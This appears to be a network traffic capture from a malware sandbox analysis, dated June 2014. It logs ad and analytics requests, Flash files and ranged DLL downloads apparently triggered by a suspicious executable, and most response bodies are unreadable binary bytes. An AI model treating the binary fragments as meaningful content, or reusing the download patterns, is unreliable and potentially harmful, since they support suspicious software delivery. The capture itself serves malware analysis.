Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
Content-Encoding: gzip
[email protected].[..L.]....!..y.Hx
......./......~w....R.....Jo. ..JH..K..k..z...?l.l.....G........F.....
.X......|... .<..'_.voit}...r.X.....)v.....wU..Uz..|...]..)V..e...N
..\.Re...........g...?...?..D...s...._..w....7..~.1z.u..O.3....6m.nzW.
..KLR......q*..O<.?W....L..:......w.>..?..Nxg......?V.>.>.
.<."Ry?...^W'......./<.........._...Z....O.x6.?...........].....
..Ji..#........W.....{...?.....H..............J.or....]#......b.....Z.
K.72.......\[email protected]<.<gO
... <bp..M...3....`.\J.....*..v...Y.-.Zt....q..p.oo%G..c..........=
..U....1.I.i4W._.E/3w..O [email protected]..,......H.>W
.....;..!....h.;K}m&..g....(...w...T).......U................wkzO..Z..
...uU.n..._............z..o........ph.j.5{{........za.)W...\pI........
%....K....[...................V~......)...D>b..vCo.QlH......K;w(.?.
?.GW...*.-...............9.1.".1..=C=P,.w.-5}..o..^..V}......ni.....k.
a......D..d.f>....v.......d....*c...oE.].;.?...V.G.7gCU\ .HU._*..Tu
.v.....8U%.y...i..id.w8.f........n...`..D...l...t...I......zG.0.oE...?
...i.a8..f._.......%.jiy.JkD.%.7...Q.:..[.DON-.?h....z6mT.-.X.....]...
o.\$kr7.....U..ck9Y........x8.?8........D.7.....lZ...H.fh..8......ViT.
$._.V....?..{.=.....6.y.4.Vt..m.6.....f.%M%....>.......E...wkj-..*y
3....U.2..Bo.....^...l..ie4X.4S....5u..Tx...LU...............9. ..O..m
...@[...*....T"...bu..TO......8.\...}3..]U4.V.....Tt...8|I.......q.g..
S_...r.2.n..k.&5..P..... M...h.s-..........6t....D...=. i..&...H..
<<< skipped >>>


GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&ep=16047,16047&et=3&fl=11.6&ja=1&ln=en-us&lo=0&nv=0&rnd=440269574&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&v=1.0.59&lv=1&tt=五金 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Fri, 13 Jun 2014 17:29:21 GMT
Server: apache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Pragma: no-cache..Content-Type: ima
ge/gif..X-Content-Type-Options: nosniff..Connection: Keep-Alive..Conte
nt-Length: 43..Date: Fri, 13 Jun 2014 17:29:21 GMT..Server: apache..GI
F89a.............!.......,...........L..;....


GET /h.js?d1117fa0662883e59acd91ed0f03b7eb HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Etag: 81ed1599659ef41161d17806c97e230d
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Type: application/javascript
Connection: Keep-Alive
Content-Length: 5282
Date: Fri, 13 Jun 2014 17:29:28 GMT
Server: apache
...............(function(){var c={id:"d1117fa0662883e59acd91ed0f03b7eb
",dm:["mnh.quzhao.com"],etrk:[],js:"tongji.baidu.com/hm-web/js/",icon:
'/hmt/icon/21|gif|20|20',br:false,ctrk:false,align:-1,nv:-1,vdur:18000
00,age:31536000000,rec:0,rp:[],trust:0,vcard:0,..i{.F.{~...F...NB.R...
h.-..z..g%.maYru.......C......j...{f7..h....,3bz...4)..N...C..N.$(.41.
k.4..........~.x|5.NzN...::..Q.d|....7...jEX...i8b./..........|X"...2.
....<..k..>..b....i..~opn9E....df.G......Yz...~.u...:........lH`
.......k2...[..&.B4.l&..`s*.Slf.....p....>....?;..Q.!...MT.s.......
@.rn.2..4JxH\u....!I..y...(.>J....Cu..r.2U......`....4.,.........q.
..BJ.R1J-.P#J..%...I..O..S:"#2..4tb....=.gv.M.u3..f..o..Z..%..lb J.-..
.M=.]&.$....q..4..Ng...|n.g,[.WfiY...v.sB../..4JLB...s=c..j).../.....Y
fZ]rL..)......h.......w..EZf.....()A.n@.. MB....9...L....$H........Yei
."[email protected]......{......L;.y..t`.5...< sfY;=jWS~
^S~......_.........!.......I....v<.n..L V.X....|39........R........
]......L..^r..{s^..|..{..5.u.1..{.5d..Im.....p#w.=5....{....#m...e.(..
...<...E.......uk.|./....w......>.U....1l_x...#40..;..$?.B.Xlr..
...[`..ZrS,!Z....H..A..I..i..8e]B.G .a.dQ2$.![[email protected]`.q...nl.N.p~..2
.C..[...w.`Yz..G.<(3N..8...H.Y^...6.d....h.,c..q:...mN.g..=<=?{x
$...R.A)koszny..#>.!P,M.....<..L...fE..~q...i....;..Z;X=.....G..
...)...R..%.Y..[..1./.D..,@S/......0........s'.r..O.$...Y.>.s......
[email protected].......~z.f.0..2.,$..?q.j...r...y.e...d..q-.?..c%...B......
.?..4.*N..j]0}..B. .v..=..\ /....e.%..w.Z..N.J.....'p.i^[email protected]>
<<< skipped >>>

GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&lt=1402680551&nv=0&rnd=1753329783&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&su=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&v=1.0.59&lv=2 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Fri, 13 Jun 2014 17:29:29 GMT
Server: apache
HTTP/1.1 200 OK..Cache-Control: private, max-age=0, no-cache..Pragma: 
no-cache..Content-Type: image/gif..X-Content-Type-Options: nosniff..Co
nnection: Keep-Alive..Content-Length: 43..Date: Fri, 13 Jun 2014 17:29
:29 GMT..Server: apache..GIF89a.............!.......,...........L..;GI
F89a.............!.......,...........L..;..



GET /media/v1/0f000AY4GuJTGCsxgDBTe0.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 4041
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.. ..x....X....W........F.M...L......TL.!..#9#...tow..n...v..SS....
pt.....r.r....y.^.z.....s...3....~......Z...qg.N-B...Y.!......Z(...BZZ
Z... .s.Q.........^(FO..R.>...6.=i..........vh,.".}......L ..q.....
..[H.r.2.......?B}..&#K.p.[.ol....X..J.....fm*......._..c\..].my....#K
.k.jo.......=(H...n5....7}wGf:imQt....q-..ug.....!..hm..m......\...9N=
..f9...@..../.h/.p...m.......A...h....K]Co_\.V.'.M....=..V.:......WM._
.......]F.,.....f..a..1..c..;..FO...Y=..N..F.~..y.*.......-.E.[\.4.;xj
I..............O......U..$.b.Q.z..,.Nv...._....M.....C......4.........
.y.b.fT..y3..o. .. v..)... .........3..24Gz.7.....uh.a.....kKn.....q..
nL..4a.=.."..g.1..R..1a;....r..?~.rcL.......7O...?.....tj|hX......5...
........../..a...r....hN.]......<4^..r..L.d.oQ1..3.},.E.2.V...}.e..
AN2!8B...M.!uI...B2O..i.......?u...o~....sc...f#.........wf"]..w...H@.
.(.k.c{.=2.........t..k....h..2...G..:.:.{;.>.83.....j....J.*.Bc:.\
....4.Lp....&f<........\^..\.X.......k..&q:...h.C...'T.X...H.}.ji..
.j.cgQM`.....BU.....'..d..2.........#..2N`@.G.#Y....J.. .'T.9^q...vQe.
\...l.}.Z'..N....)...j..&....r.......P...l.....yN.).&F....4..#).....2.
#...?L&.b....&..n. ../.).rEj....|.!a..L.5.H... ..0Y[z..!.......j>.\
[email protected]....}..U.&;mq....zA
2.L[.b7&kQ.d .*..mvL.|..0S..*Q.L..!../].>...........3.v..N.Ny..Ny..
R...|.f}...b..k..!k...`[e....k..rL...yN........N.X.....X...).o. d-|5YS
...."...4.k6.Tq..5...eA..=.{.S..p\...d.U..B..C.L.I.. ....~..#d..L*..B-
..T.....og.)"1Y.:frI.G....K.... ..A..;..N...q4...................@
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=917504-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:16 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 327104
Content-Range: bytes 917504-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
....dw...Tw......=.w...r..pw..P..2.....3....w........w...pw......=.w..
.r...w..P..2.....3....w........w....w......=.w...r...w..P.]2.....3....
w........w....w......=.w...r...w..P.-2.....3....w........w....w......=
.w...r...w..P..1.....3....w........w....w......=.x...r...w..P..1.....3
....x........x....w......=,x...r...x..P..1.....3...,x.......(x....x...
...=Hx...r..4x..P.m1.....3...Hx.......Dx...4x......=dx...r..Px..P.=1..
...3...dx.......`x...Px......=.x...r..lx..P..1.....3....x.......|x...l
x......=.x...r...x..P..0.....3....x........x....x......=.x...r...x..P.
.0.....3....x........x....x......=.x...r...x..P.}0.....3....x........x
....x......=.x...r...x..P.M0.....3....x........x....x......=.y...r...x
..P..0.....3....y........y....x......=(y...r...y..P../.....3...(y.....
..$y....y......=Dy...r..0y..P../[email protected]......=`y...r
..Ly..P../.....3...`y.......\y...Ly......=|y...r..hy..P.]/.....3...|y.
......xy...hy......=.y...r...y..P.-/.....3....y........y....y.....h ..
.........u..%\..............h ...........u..%\.....................t..
...........u....P.....3..........t.P..................3..........t.P..
................h ...........u..%\...............=.y...r...y..P.=.....
.3....y........y..f..y.....=.y...r...y..P........3....y........y....y.
....hp.....|.........=.....r......P..-.....3........................3.
.........t.P..................3..........t.P...................=.....r
......P.]-.....3........................h ...........u..%\............
..................3..........t.P..................................
<<< skipped >>>


GET /media/v1/0f000KXFAo9s7mobL64F3f.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:38 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2634
Cache-Control: max-age=31536000
Expires: Fri, 24 Oct 2014 23:43:51 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..V.P.......{{...;..8....[......9$....1.s.{{..qws.....B$d2N.3
....B..X..c.j.Q.2..N..&.F..4-.&Jk.q..}{.........}...........b........e
.. ./..%..7m......p.......r........YU...8...]......5.Q....|.&./.hM ...
b,.....]..BdH.....V.xCit(.J...N)$.Ja9....#.|b.?....V>...E^Q.L......
.~X....x..y....1..#.V.7.?,[email protected]..`....Z...o.V.....b..^1c.^_
..e2(...9..4.6...#C1Qj-.....R..]. ........V)\..'..AJ..e....[U...._m..&
.....cOa.8...k...V.0/.Z.M---m..H....a......j<."..[.Vb%....`)..A"x.t
.. .v.#a.X........h.-..SO..`o...}a.H..r......-...7...._._..b......u}..
...M....f.`.<..vS....j.Jq64?.~........?=p1.%..........?.s../j...$T;
......y...G...pj.......3..]{..<..x...d~1....QH\|....gA3[..[n.U|....
....._N..~)..jv..WB..z.o$w....S.....K.0.~.,....w.o..".Ci....J{...W....
.k.}{........#.7..*:.m.....`.... ...IKU.@%.}..%.....o6N....q.?.X?.I...
.d.........{7..],..d..&.J...%..NZ.........Of.E..f...L..-|.{).}...,>
:wt...o....... .5}....f..w..b<.....>ib..^4....,|r..>,...y/..[
.5[]..w...l)uX...s......a.....>.......S_x...sE.<.(....Cs.X......
.c6.i..'.S)..S..[*...l.>.h. ..gb....U........l.F.5{....~.8.m....'..
.../).c.h"2.{,.......k.............-&6....LS...9.7.l...x..".9..2....Y:
.yX.....t.p..%.....v...|O.|...G.X.1M....|'.... ...MBC.3...-N...`.d...m
v.^.}".V....v;.O.-hU....~..V..(@[email protected]
.....O........^z........w..m.d...........".A...>..B|V..mM...3....-.
7.r. ....._..{.@'X...Aw.....37.....g.....(.~Q.V.|.N.VQ...B]...p..T..p.
..lC..~.........=5.5....DGc...\)..{"Ca....#.h$........^...V.....A.
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=851968-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:54 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 355552
Content-Range: bytes 851968-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
....t)[email protected]"[email protected]......#.;.u..E.....]..E.....tO.E.@.
].uF.E......#.=...@......=......G...;.u".E.;.v........................
..............`..........D.$..2M....0...........`..........D.$.M......
........8]...u!.E..t..............`.......D.... .}........#.;........E
.........u....a..S.u..E.j.P.u.......W.u...d`.............t`..P..;.....
..........`.......D... ..6..1..Y.....j.SS.6................SSS.6.....#
.............j..E.P.6..'.................tg..........}.....uU.E.......
.E.;.........................j.SS.6..........tySSS.6........#......_..
..<....E.%....=....u..6.....Y..:..j.^.0.......=....u.Sj..6.J.......
.........E.......SS.6.,..........E.3.Ht.H.......E......E........E.....
.E......E. .P.D=.P.6.(.........t...9}.........6.....Y..9.....E....6...
.....`.............._^[..j.hh=....j...M..3..u.3.9u....;.u...9........V
[email protected]...........}.;.t<
;.\9...8..3.9u.t 9u.t..E.....M..........`....D... ..u..)1..Y..E...j...
j.h.=...2j..3..u.3..}.;....;.u...8..j._.8VVVVV...........Y...3.9u....;
.t.9u.t..E.%[email protected].
;.t......i...3..}.9u.t(9u.t.................`....D... ..7.T0..Y.U..Q.M
..j..E.P.u..u..u..u...........t.......E...U..j..u..u..u..u..u.........
].U.....SVW3.j.SS.u..]..]..;....E.#........U.tYj.SS.u........#.......t
A.u..}. ...........;............Sj....a..P...a.....E.u...7.........w7.
..._^[..h.....u......YY.E...|...;.r.......P.u..u..0.........t6. ...x..
...w..u..u..u......YY.u.j....a..P...a..3........7...8.u...6.......
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=131072-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:02 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1113536
Content-Range: bytes 131072-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
.][..............G.V.0...G..@.;w..G.....t"S...I....F.P.%...V..2.....;_
...u.[^...j.h.f..d.....PVW.D7..3.P.D$.d......|$..D$......G......w....G
.....t*.F........u....B......N........u....P......D$......w...t*.F....
....u....B......N........u....P......L$.d......Y_^............W.y.....
._.......D$.WP.y..B..._.................W.y......_.........VW...D$....
.......L$..D$...Q...V...P.|$.. l...T$........A..t...P.x........_^.....
............V.0W.x..F...t..N. ..1..0............;.r...6....k.T.F._^...
......j.h.[..d.....PQSW.D7..3.P.D$.d......|..



GET /support/mini/fyminiloader-min.js HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.m0dlcdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Jan 2013 07:55:33 GMT
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip
X-Via-Cache: sx
Content-Length: 363
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 03:20:00 GMT
Age: 136814
Connection: keep-alive
X-cdn: ydcdn
X-hit-at: sx
..........}Q]O.0.. .&.f..l..:...MtO..........$.wK...}:...s...U.J.B4t..
9f..5W6..>W|.O.W... ...j]K%..!g..I.....!x.&>..s......>.0H~..s
.no...>....L.....@&.....>.*:....J.h....97K.....h.....B.&..o$x.5*
..........tQc[)Z..d......l....g.h.X].A,.g.8N7(08.............xZ....1".
k.....,m... ...T3..X. .G..K..q.q...` .._-..q.a....]UR..........~<\.
L......A.GR)n^>..p1..e.B.......HTTP/1.1 200 OK..Content-Type: appli
cation/x-javascript..Last-Modified: Fri, 11 Jan 2013 07:55:33 GMT..Exp
ires: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control: max-age=315360000.
.Content-Encoding: gzip..X-Via-Cache: sx..Content-Length: 363..Accept-
Ranges: bytes..Date: Fri, 13 Jun 2014 03:20:00 GMT..Age: 136814..Conne
ction: keep-alive..X-cdn: ydcdn..X-hit-at: sx............}Q]O.0.. .&.f
..l..:...MtO..........$.wK...}:...s...U.J.B4t..9f..5W6..>W|.O.W... 
...j]K%..!g..I.....!x.&>..s......>.0H~..s.no...>....L.....@&.
....>.*:....J.h....97K.....h.....B.&..o$x.5*..........tQc[)Z..d....
..l....g.h.X].A,.g.8N7(08.............xZ....1".k.....,m... ...T3..X. .
G..K..q.q...` .._-..q.a....]UR..........~<\.L......A.GR)n^>..p1.
.e.B.........



GET /a.js?did=1&ch=0&jk=cadbaab171a45209&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537509&word=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=26063&ps=20140613082900681&it=15891&vs=1&vt=15891&ft=26063&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566744 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: eclick.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:25 GMT
Content-Type: application/x-javascript
Content-Length: 0
Last-Modified: Thu, 01 Sep 2011 06:45:57 GMT
Connection: keep-alive
Expires: Fri, 13 Jun 2014 18:29:25 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx..Date: Fri, 13 Jun 2014 17:29:25 GMT..C
ontent-Type: application/x-javascript..Content-Length: 0..Last-Modifie
d: Thu, 01 Sep 2011 06:45:57 GMT..Connection: keep-alive..Expires: Fri
, 13 Jun 2014 18:29:25 GMT..Cache-Control: max-age=3600..Accept-Ranges
: bytes..



GET /media/v1/0f000jtT4CGxjFHdyV6mBf.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:36 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2564
Cache-Control: max-age=31536000
Expires: Thu, 26 Mar 2015 08:47:16 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.}...x..Vkp...>wW. ..~H~....c..,.I..$.O...E......je)......uY.T.N
..LI..G.2..<:.t.L'-.a(....GS.m`....I.a...{Wr^..GW........s...ah....
.B0XV...V....H.C={.}.tT..zHogKX..=n...l....xr.......t.;;]..J..d.....[.
E..bJHF.r$.s.}....;[Z.....N.3I..2(.EI..19..h. ..BO(..r..K$......iW*...
.........;.W.....99..r.(w..,./.T}b.."..x-..T...Y...\$8......1..q.P...l
..mJ(...2^oQu...S... z.d1-..4.qkr."q...nZ..1..HQ{YT.............t;:..x
:{:JT..../.~MB...A.9z..P...w.4...<...........~R.W..5W...d.V..!H...A
..bp*.............#...^.6.C...[.T.......lo..Qam....=6v......q0.G.~....
....P.......ngf.8h.mY<.......pf.B.G/?..X.}.1......:..}..Sf.1....,..
 .{1GF0:.....8w.....jeL...[.._.e.......i]....fG.....aS..zas.6..}"t6l_.
rbG}`........]...-..._..}.p.R..^.RZ.,.elc.......'.Y4.nI.....X.?d~ ?...
I....T.........#.:{....n....... ..E....@?..n=.J`..v....?...B.~tp......
S.* ..*_..m[...u..M.p3}xil?.X;..vv.h.!..O......D......[e~!.[...E&..]..
...'....{4.[.b3}.q......xA.{.N..;F..-J.m.l~....K...O'm....>....n..'
.F.........j....V.R.....0f^....9G.........Jn>.{.w.9.........m...b.m
y..._|.z.^...}........o....r`.Cg.c.......I?.P .hB./p..4......:....|&.}
.!.ORZ..;........w.}...?.~..Q....|...-Z..h.....%....C...'>.........
.F]......?..................l.f.f.5y.bHw.2.w?......|`..R6....t'?'.\~.0
..........5QK0t..g-Y0.[[email protected];. @....8.B..|............... ..x.......]&
gt;......K...R?..4.Xl.....v^j=Hd.^..S.z...9i...w...b....On[..cG..c...p
..xl.......xb.......F./>...I.@<..'..v{.....*...D.BI.*v....\>.
j.1....`$...9.H"..E.....o..Qf.hS.u.....Hl..=...V.%!....R].1)yN.5$.
<<< skipped >>>


GET /analytics.js HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 09:38:41 GMT
Expires: Fri, 13 Jun 2014 21:38:41 GMT
Last-Modified: Thu, 29 May 2014 22:33:33 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 10790
Age: 28211
Cache-Control: public, max-age=43200
Alternate-Protocol: 80:quic
...........|}[.....~.;....ah......*".......I.R(m.Ny.....o.$3.....u..M3
 [email protected]/e.P.(...N>..}1..... .'.Uo..W"..8.>....$..h_f.M.
....K...i.M..C...E.....{.P.4MNP..u=...d|....;...G^..3@d...=.x....4..%}
..<-3..4..px......S.n.^.y.wr}p.......B.=....9.g_d..:..3N...g...S...
.4.Y..O......T..ei/.d.w.y4EOhT...Ak....}.y.d....o4...av3B.>..~....4
eo..Q..:.Qg.$-..,MS....B"S.......}b.hL.......!>.y...^....b..... 44.
......s.%..q..........]..2......#...w..O....a.5v1....*I_.q.5y e4H....V
..4...8.*Fy&.A..NT..L.~T.x2L}....PQ..6e...T.j .......Ax....Z}.t......M
..'A..2-....-D..../._...}.vo.......?}.r...w. `J..wv....G..q6.....]...o
<~....V~z....S[.i-hZ....;...U..y.YqJ..2..IZ..J.o).T...."B...CY..K]*
...g...n..........w.lx.[.~........_.h.......*.\^^.o.2T..0d...UL..a6.=.
.F2..kQ$.d\*...1.........h...a.TG..q...TE2_...=`C.5.F{'...{...(Z.W6?p$
..5..kO.})-.yy................z....?.:..L.H...%tp..7.2.Zo_.....Y2H..].
O.*..4..eR.r......a..(...Q.?.n1....LL...!...bx.,v~..._..u2.}...}......
